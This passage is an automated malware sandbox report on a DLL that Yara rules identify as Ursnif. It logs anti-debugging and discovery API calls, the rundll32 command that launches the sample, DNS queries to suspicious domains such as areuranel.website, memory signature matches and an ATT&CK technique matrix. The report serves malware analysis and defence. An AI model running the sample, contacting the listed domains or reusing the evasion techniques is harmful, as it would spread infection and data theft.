                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 0000000C.00000003.926283769.00000000048B6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWm32\advapi32.dll
                      Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.902665043.0000000004560000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.938125643.0000000005307000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 0000000F.00000003.936044986.0000000005307000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E32C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E338861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E37DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E32C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E338861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E37DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E37DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E37DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E30B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E316CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E30B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.218.66 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.153.146 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.137.210 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1185146883.0000000001AD0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.874775508.0000000003860000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1186416387.00000000038B0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.884091204.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.892445877.00000000034A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDA82B cpuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E32FF15 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2D1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CDA82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eca31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.8aa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e2d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4cd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1370000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.139a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.35594a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4970000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.52294a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Virtualization/Sandbox Evasion1Input Capture1System Time Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
